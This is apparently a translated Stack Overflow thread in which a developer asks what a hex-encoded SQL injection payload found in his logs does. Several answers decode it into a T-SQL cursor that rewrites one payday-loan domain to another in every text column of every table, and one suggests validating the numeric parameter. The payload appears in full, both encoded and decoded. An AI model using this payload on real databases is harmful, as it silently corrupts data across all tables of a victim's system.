它有什么作用。?

【问题标题】:What does it do.?它有什么作用。?
【发布时间】:2013-03-06 10:10:59
【问题描述】:

我最近在 SQL Profiler 的帮助下在我的应用程序中找到了导致 SQL 注入的原因:

原因是这样说的:

SELECT * FROM tbl_posting_job_info where job_posting_id=33131 declare @s varchar(8000) set @s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b 40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c2027276164616d7061796461796c6f616e732e636f6d27272c202727647265777061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b65202727256164616d7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as varchar(8000)) exec(@s)

作为查询字符串传递。

那么谁能告诉我上面写了什么..?

【问题讨论】:

    标签: sql sql-injection


    【解决方案1】:

    Exec 可以执行以字符串形式传递的 SQL 代码。因此,他们将字符串混淆为字符的十六进制代码,以降低您的可读性。如果您将其从十六进制转换为文本,则会给出:

    set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    格式化版本:

    SET ansi_warnings OFF 

DECLARE @T VARCHAR(255), 
        @C VARCHAR(255) 
DECLARE table_cursor CURSOR FOR 
  SELECT c.table_name, 
         c.column_name 
  FROM   information_schema.columns c, 
         information_schema.tables t 
  WHERE  c.data_type IN ( 'nvarchar', 'varchar', 'ntext', 'text' ) 
         AND c.character_maximum_length > 10 
         AND t.table_name = c.table_name 
         AND t.table_type = 'BASE TABLE' 

OPEN table_cursor 

FETCH next FROM table_cursor INTO @T, @C 

WHILE( @@FETCH_STATUS = 0 ) 
  BEGIN 
      EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+ 
      '], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+ 
      '] like ''%adampaydayloans.com%'' ') 

      FETCH next FROM table_cursor INTO @T, @C 
  END 

CLOSE table_cursor 

DEALLOCATE table_cursor

    【讨论】:

    • 是否会因为数据库中多个表受到影响而影响具有相同查询的每个表??
    • @VishalSuthar 它将影响所有表,因为它会遍历 db 中的每个表,因为它会遍历 information_schema.tables
    • @VishalSuthar 不是我说的那样。它将影响每个至少有一个类型为“nvarchar”、“varchar”、“ntext”、“text”的列的表。基本上它会尝试更改电子邮件地址的域名。
    【解决方案2】:

    字符串是

    的十六进制编码版本

    set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar ','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE (@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans. com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    我已经使用http://home.paulschou.net/tools/xlate/ 对其进行解码。

    Nicely formatted,SQL代码如下:

    SET ansi_warnings OFF 

DECLARE @T VARCHAR(255), 
        @C VARCHAR(255) 
DECLARE table_cursor CURSOR FOR 
  SELECT c.table_name, 
         c.column_name 
  FROM   information_schema.columns c, 
         information_schema.tables t 
  WHERE  c.data_type IN ( 'nvarchar', 'varchar', 'ntext', 'text' ) 
         AND c.character_maximum_length > 10 
         AND t.table_name = c.table_name 
         AND t.table_type = 'BASE TABLE' 

OPEN table_cursor 

FETCH next FROM table_cursor INTO @T, @C 

WHILE( @@FETCH_STATUS = 0 ) 
  BEGIN 
      EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+ 
      '], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+ 
      '] like ''%adampaydayloans.com%'' ') 

      FETCH next FROM table_cursor INTO @T, @C 
  END 

CLOSE table_cursor 

DEALLOCATE table_cursor

    【讨论】:

    • 是否会因为数据库中多个表受到影响而影响具有相同查询的多个表??
    • @VishalSuthar:从外观上看,它可能会修改架构中的每个表。
    【解决方案3】:
    SELECT cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c2027276164616d7061 796461796c6f616e732e636f6d27272c202727647265777061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b65202727256164616d7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as varchar(8000))

    产量:

    set ansi_warnings off 
DECLARE @T VARCHAR(255),@C VARCHAR(255) 
DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from     
INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t 
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and 
c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE 
TABLE' 

OPEN Table_Cursor 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
WHILE(@@FETCH_STATUS=0) 
BEGIN 
EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', 
''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') 
FETCH NEXT FROM Table_Cursor INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

    本质上,它正在检查表中是否出现字符串adampaydayloans.com,并将其替换为另一个值drewpaydayloans.com

    【讨论】:

    • 谢谢 SchmitzIT 的回答..!!
    【解决方案4】:

    如果你在你的数据库中执行下面的查询

    select cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c2027276164616d7061796461796c6f616e732e636f6d27272c202727647265777061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b65202727256164616d7061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72 as varchar(8000))

    你会得到

    set ansi_warnings off DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name and t.table_type='BASE TABLE' OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'') where ['+@C+'] like ''%adampaydayloans.com%'' ') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    您应该在执行查询之前验证 job_posting_id 是否是一个数字,这样就无法注入他们的代码。

    【讨论】:

    • 感谢马拉斯的帮助。!!是的,我必须验证job_posting_id
    【解决方案5】:

    使用这个:

    http://www.dolcevie.com/js/converter.html

    看起来传入的十六进制变成了这个

    set ansi_warnings off 
DECLARE @T VARCHAR(255),@C VARCHAR(255) 
DECLARE Table_Cursor CURSOR FOR 
select c.TABLE_NAME,
       c.COLUMN_NAME 
from INFORMATION_SCHEMA.columns c, 
INFORMATION_SCHEMA.tables t 
where c.DATA_TYPE in ('nvarchar','varchar','ntext','text') 
and c.CHARACTER_MAXIMUM_LENGTH>10 and t.table_name=c.table_name 
and t.table_type='BASE TABLE' 


OPEN Table_Cursor 
FETCH NEXT 
FROM Table_Cursor 
INTO @T,@C 

WHILE(@@FETCH_STATUS=0) 
BEGIN 
  EXEC(
    'UPDATE ['+@T+'] 
    SET ['+@C+']=REPLACE(['+@C+'], ''adampaydayloans.com'', ''drewpaydayloans.com'')
    where ['+@C+'] like ''%adampaydayloans.com%'' 
  ') 

  FETCH NEXT FROM Table_Cursor 
  INTO @T,@C 
END 

CLOSE Table_Cursor 
DEALLOCATE Table_Cursor

    所以看起来一些可疑的发薪日贷款类型正在尝试更改数据库中包含指向某些竞争对手的链接的所有 varchar/文本字段,以包含指向其发薪日贷款网站的链接。

    【讨论】:

      猜你喜欢
      • 2011-01-14
      • 2019-04-26
      • 2016-04-29
      • 2017-03-02
      • 2012-10-04
      • 1970-01-01
      • 2014-05-03
      • 2018-09-20
      • 2010-11-10
      相关资源
      最近更新 更多
      热门标签
      Java Python linux javascript Mysql C# Docker 算法 前端 SpringBoot Redis Vue spring 设计模式 .net core .net kubernetes c++ 数据库 数据结构 大数据 js 机器学习 微服务 Android Go 程序员 面试 JVM ASP.net core 云原生 人工智能 后端 PHP git CSS golang k8s Nginx Django mybatis 深度学习 多线程 React 架构 devops 爬虫 云计算 Spring Boot LeetCode